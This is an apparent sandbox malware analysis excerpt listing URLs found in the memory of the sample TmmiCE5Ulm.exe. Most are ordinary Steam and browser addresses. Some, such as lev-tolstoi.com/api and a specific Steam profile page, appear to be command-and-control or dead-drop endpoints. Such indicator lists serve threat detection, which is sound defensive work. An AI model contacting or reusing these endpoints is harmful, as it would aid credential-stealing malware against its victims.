                Source: TmmiCE5Ulm.exe, 00000000.00000003.2156635804.0000000005AC1000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2156755347.0000000005ABE000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2156870694.0000000005ABE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2109270676.0000000001154000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampowered.com/
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2109270676.0000000001184000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001192000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001192000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001192000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001192000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001192000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001192000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001192000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2132726091.000000000110D000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001192000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001192000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2132726091.000000000110D000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001192000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2132726091.000000000110D000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=_92TWn81
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001192000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=hyEE
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001192000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001192000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001192000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001192000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001192000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001192000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001192000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001192000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001192000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001192000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=St3gSJx2HFUZ&l=e
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001192000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001192000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=en
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001192000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001192000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001192000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001192000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2206551720.0000000005B03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2206551720.0000000005B03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2156635804.0000000005AC1000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2156755347.0000000005ABE000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2156870694.0000000005ABE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2156635804.0000000005AC1000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2156755347.0000000005ABE000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2156870694.0000000005ABE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2156635804.0000000005AC1000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2156755347.0000000005ABE000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2156870694.0000000005ABE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: TmmiCE5Ulm.exe, 00000000.00000002.2688215527.00000000011B9000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000002.2690091376.0000000005B09000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2409438639.00000000011B8000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2409381050.00000000011A4000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2409146236.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2409198579.000000000119C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dz8aopenkvv6s.cloudfront.net
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2109270676.0000000001154000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2206551720.0000000005B03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2270145793.00000000011AB000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2231698697.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000002.2689933527.0000000005A80000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2205019616.000000000118B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2132726091.0000000001154000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109270676.0000000001161000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/2
                Source: TmmiCE5Ulm.exe, 00000000.00000002.2689933527.0000000005A80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/=9
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2132726091.0000000001154000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2334313230.0000000001128000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109270676.0000000001161000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2270285574.0000000001128000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2334452536.000000000112B000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2204720643.0000000005B06000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2334313230.0000000001149000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2204795356.0000000005B06000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2204356484.0000000005B00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/api
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2155269616.0000000001154000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/b
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2334229101.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2228599565.000000000118B000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2204525623.0000000001193000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2205019616.000000000118B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/d
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2155269616.0000000001113000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2252932999.00000000011AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/pi
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2132726091.0000000001154000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109270676.0000000001161000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/pi:
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2252932999.00000000011AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/plF
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2204525623.0000000001193000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2205019616.000000000118B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/tF
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2270285574.0000000001143000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com:443/api
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2109270676.0000000001154000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2109270676.0000000001154000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2109270676.0000000001154000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2109270676.0000000001154000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2109270676.0000000001154000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2204525623.000000000118B000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109270676.0000000001184000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2109270676.0000000001154000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2408821041.0000000005B06000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000002.2688164936.000000000119C000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000002.2688215527.00000000011B9000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000002.2690091376.0000000005B06000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000002.2690091376.0000000005B09000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2409438639.00000000011B8000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2409146236.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2409198579.000000000119C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://remote-app-switcher.prod-east.frontend.public.atl-paas.net
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2408821041.0000000005B06000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000002.2688164936.000000000119C000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000002.2688215527.00000000011B9000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000002.2690091376.0000000005B06000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000002.2690091376.0000000005B09000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2409438639.00000000011B8000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2409146236.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2409198579.000000000119C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2109270676.0000000001154000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2204525623.000000000118B000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109270676.0000000001184000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2109270676.0000000001154000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2109270676.0000000001154000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2109270676.0000000001154000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized.net
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2109270676.0000000001154000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2109270676.0000000001154000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001192000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/market/
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001192000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2132726091.000000000110D000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
